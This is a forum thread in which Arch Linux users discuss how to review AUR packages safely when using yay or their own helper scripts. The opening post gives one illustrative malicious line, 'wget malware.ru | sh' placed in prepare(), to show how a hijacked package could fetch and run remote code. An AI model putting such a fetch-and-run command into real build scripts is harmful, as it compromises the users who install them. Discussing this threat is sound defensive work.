Workflow to manage AUR packages safely using yay?

mbw · 2023-06-19 08:30:34

By default, invoking

yay

, I am asked the following things:

Which packages to exclude
Which packages to cleanBuild (as I understand it: git clone again instead of git merge?)
Which packages to show a
```
git diff
```
for (shows PKGBUILD and other files, but everything is shown as new/green

AUR packages are not curated in the same way community packages are. For instance, anyone could adopt an orphaned package and introduce malicious code by e.g. changing the

source

field or

wget malware.ru | sh

in the

prepare()

or whatever.
Like what happened here for example.

So how do you all work with yay/AUR on a day to day basis?
Do you just confirm everything, or do you have your personal workflow of sanity-checking some things (and what?) beforehand?
Do you use additional/different tools that help you in this regard?
Are there any resources, maybe on the arch wiki, I may have missed?

Inb4 "don't use an AUR helper": When i started out with Arch in 2019, I managed all AUR packages by hand.
This however became super tedious when upgrading at some point...

dogknowsnx · 2023-06-19 08:49:42

So basically what you're saying is, you don't trust the aur but you want to use a don't-worry-I-will-take-care-of-everything aur helper... What's wrong with this picture?

mbw · 2023-06-19 09:13:02

I would prefer to use an AUR helper in a way that strikes some middle ground between security and convenience.
While yay may have default actions I can just confirm, it also has lots of options.
Thus, I don't think it's stupid to ask if others use it in a way that addresses the above concerns?

dogknowsnx · 2023-06-19 09:30:43

Disclaimer: I'm not using any "foreign" aur helpers myself (only my own scripts, that is).

Ok, my 5 cents would be this: Only install packages whose source you do trust (no-brainer). Definitely check whether the source of a pending update changed. If you're using any '-git' packages, you will have to clean build them in order for new commits to be merged (yay will only notify you about an updated PKGBUILD here), all other packages normally don't need a clean build. Don't use yay

Last edited by dogknowsnx (2023-06-19 09:39:37)

Alad · 2023-06-19 09:49:52

I would prefer to use an AUR helper in a way that strikes some middle ground between security and convenience.

Pacman wrappers like yay make untrusted packages (AUR) look the same as trusted ones (Arch repositories). They use the same syntax for both, and list both as equivalent source of packages.

A first step is then to not use pacman wrappers. See the table here: https://wiki.archlinux.org/title/AUR_he … _and_build

Awebb · 2023-06-19 12:24:16

Q: So how do you all work with yay/AUR on a day to day basis? Do you just confirm everything, or do you have your personal workflow of sanity-checking some things (and what?) beforehand? Do you use additional/different tools that help you in this regard?
A:
I use auracle to search the aur, see if there is anything to update and for the "buildorder" option.
I have a pacman hook that "auracle outated" on every update and one from rebuild-detector that *drumroll* checks if a package needs to be rebuilt. Hasn't failed so far, although it probably isn't all-knowing.
I have three helper functions with a total less than 60 lines of code.

aurget:
They only clone on new repos and merge --ff-only on existing repos and only if there is anything new.
I don't build from the git repo folder, but copy the thing to a temp folder ignoring .git. Then it displays the PKGBUILD. Then I type makepkg -si. Has a toggle to not show the PKGBUILD if called from a script.

aurupdate:
If I'm sure I've read all I need about the new version (i.e. have reviewed the PKGBUILD), aurupdate loops through "auracle -q outdated" and calls aurget for each of them. Should probably call aurchain instead, but it has never failed.

aurchain:
Goes over "auracle buildorder" and calls aurget and makepkg -si on the list without displaying the PKGBUILD. I expect myself to have checked that. I just realised I never wrote an "--asdeps" handler.

Done packages go to ~/build/done.

The git diff part is tricky, because nothing tracks the commit that went and became the last installed package. That's why I always read the PKGBUILD or git diff manually. Diffing the last two commits does not produce secure results.

Q: Which packages to exclude:
A: None, unless there is a need.

Q: Which packages to cleanBuild (as I understand it: git clone again instead of git merge?)
A: None, always merge and never build from the git repo directly.

Q: Which packages to show a git diff for?
A: None/Any. If yay shows only green, then yay is using git diff wrong. "git diff commit1 commit2", see git log.

Q: Are there any resources, maybe on the arch wiki, I may have missed?
A: https://wiki.archlinux.org/title/AUR_helpers

Q: Inb4 "don't use an AUR helper": When i started out with Arch in 2019, I managed all AUR packages by hand. This however became super tedious when upgrading at some point...
A: for i in $(pacman -Qqem); do...
1. check for an update
2. merge your local git cache
3. copy files to some temp
4. display PKGBUILD
5. makepkg and install package
done

mbw · 2023-06-24 09:00:08

Thanks for the replies!
In particular, the very detailed last one which I somehow missed because I cannot read and did not realize that new email notifications will only arrive when I visit the forum again.

The issue with yay not displaying a sensible diff is indeed an open bug it seems .

I will try to transition away from yay again and maybe try to get something simpler to work like aurutils or similar, after doing some review.

Maybe even hand-roll the loop at the end of the last post and go from there, haven't decided yet.

Arch Linux

#1 2023-06-19 08:30:34

Workflow to manage AUR packages safely using yay?

#2 2023-06-19 08:49:42

Re: Workflow to manage AUR packages safely using yay?

#3 2023-06-19 09:13:02

Re: Workflow to manage AUR packages safely using yay?

#4 2023-06-19 09:30:43

Re: Workflow to manage AUR packages safely using yay?

#5 2023-06-19 09:49:52

Re: Workflow to manage AUR packages safely using yay?

#6 2023-06-19 12:24:16

Re: Workflow to manage AUR packages safely using yay?

#7 2023-06-24 09:00:08

Re: Workflow to manage AUR packages safely using yay?

Board footer